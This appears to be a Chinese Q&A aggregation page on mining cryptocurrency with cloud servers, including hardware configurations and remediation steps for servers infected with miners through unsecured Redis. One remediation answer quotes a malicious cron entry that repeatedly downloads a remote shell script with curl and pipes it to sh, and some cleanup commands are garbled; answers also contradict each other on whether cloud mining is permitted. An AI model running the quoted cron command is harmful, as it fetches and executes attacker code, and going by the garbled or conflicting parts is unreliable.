云服务器如何挖矿
⑴ 阿里云允许用云主机挖矿吗
是可以的。很多挖矿项目都可以使用云服务器,例如最近火热的Swarm bzz。但Swarm白皮书没有提供挖矿的硬件配置推荐,然而目前,因为各类硬件采购价格高、到货慢,然而时间不等人!综合对比下来,针对BZZ挖矿,推荐云服务器!
像Swarm BZZ这样的去中心化存储的情况下,以太坊生态中的热点数据每秒都在随时被调用和存储,所以除了CPU、内存和硬盘这三个主要的响应能力之外,还有一个要求宽带传输速度。
使用云服务器来部署bzz节点,核心理由就是一个字“快”,节点早一分钟上线,就能更早的获取到头矿!
经西部数码上千bzz节点部署的实践经验证明,bzz节点需要较高的带宽和超强的磁盘IO性能,以下是结合资源实际消耗情况合理搭配的配置。
4核CPU + 4G内存 + 100G SSD硬盘 + 20M带宽。上述配置,可以部署一个节点。
如果需要部署多节点可以选择多台这样的云服务器,或者选择更高配置的云服务器,如16核CPU + 24G内存 + 500G SSD硬盘 + 200M带宽,可部署5-10个节点。
⑵ 能否用云服务器进行cpu挖矿
当然可以啦!
不过要选择可以Cpu挖矿的币。
1.cpu挖矿的本身比较少了,比较有名的有:xmr,hsr等
2.租用服务器的成本要考虑进去了。
挖矿基本没法他用了
⑶ 如何用Linux服务器挖矿教程
今天早上起来一看,服务器脚本一个都没有启动!甚是奇怪,远程登录服务器,也是异常的卡,直到最后卡死,只好重新启动服务器!
启动之后没一会又会变卡,越来越卡,top查看进程!不觉又奇怪的进程,因为平常也不经常看!所以自己也搞不明白怎么回事儿!只好到群里问了问,说是被挖矿的挂了木马文件了,是由于redis的漏洞!
后来我自己发现,原来redis远程可以直接登录,原以为redis和mysql不开放登录权限就不会支持远程登录呢,看来是我想多了
看了好长时间才发现一个异常的进程,自启的进程 molibe !
找到进程位置 ps -ef|grep molibe ;
在tmp目录下,打开一看的确是有
chmod -x molibe 取消执行权限在来到/var/spool/cron下,cat root 查看定时器的执行发现之前脚本都被改了,顾不得删除cron,service crond restart 重新启动,再有就时kill 掉molibe进程
这样大概整个就结束了!但是根本是因为redis漏洞,所以还是补上吧
首先修改redis'端口,找到redis.conf文件 port **** 修改端口号再有就是必须修改密码 # requirepass ******** 去除#号重新启动 /redis/src/redis-server /redis/redis-conf
启动成功之后
redis/redis-cli -p ****(端口) -a *****(密码)
⑷ 如何把右下角挖矿测试去除
一种是使用云安全中心自动清理,另一种是手动清除。登录到云安全中心控制台左侧栏,选择威胁检测,安全告警处理在安全告警处理列表中,找到挖矿程序,然后点处理云安全中心安全告警处理然后根据提示一步步操作即可。
去除的方法
手动清除挖矿程序护云盾以Linux服务器为例,按照以下步骤排查及处理查看挖矿进程的执行PID,命令表示该进程的PID。清除挖矿进程的执行文件,在高CPU消耗的进程中定位到挖矿进程,并杀死该进程。
检查云服务器的防火墙中是否存在挖矿程序的矿池地址,可疑通信地址和开放端口,命令iptablesLn执行以下命令清除恶意矿池地址vietcsysconfigiptables排查是否存在定时任务crontabl根据排查的结果,对可疑的定时任务文件进行清理,防止二次入侵。
⑸ GEC微型云矿机是什么
GEC微型云矿机是通过大量的专业计算芯片,并配有特制的主板插槽,加上高速云端服务器的应用,共同组成的一个大型矿机网络。
采用多芯片,多处理器的并行算法,因此,比个人计算机挖矿更快,效率更高。
⑹ 用GPU云服务器可以挖矿么比如最近很火的以太坊
挖矿跟显存没关系,是看GPU核心的计算能力,只要是显卡就能挖矿,但只会选用性价比高的中高端显卡,还有专门的非显卡矿机不用显卡挖矿,但矿机只能挖对应的一种币,不能自行更换币种,如果是显卡组矿机的话只要有算法,哪种币都可以挖
⑺ 阿里云服务器被挖矿了怎么办(纯纯电脑小白
1. 关闭访问挖矿服务器的访问
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。
3. pkill minerd ,杀掉进程
4. service stop crond 或者 crontab -r 删除所有的执行计划
5. 执行top,查看了一会,没有再发现minerd 进程了。
6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下,感兴趣的可以研究下:
View Code
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blog.jobbole.com/94518/然后就注入了病毒,下面是解决办法和清除工作:
1. 修复 redis 的后门,
配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号
3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.
⑻ 如何通过云计算服务器实现比特币挖矿
各公有云厂商都明确要求不允许使用云服务器进行挖矿,否则会被封禁的;
挖矿主要使用的是GPU,目前各公有云厂商提供的GPU服务器都比较贵的,从性价比上来说不划算,还不如用专用芯片;
当然,有黑客通过漏洞入侵服务器,在上面植入挖矿程序和脚本,进行挖矿操作,但这个本身是不合法的行为。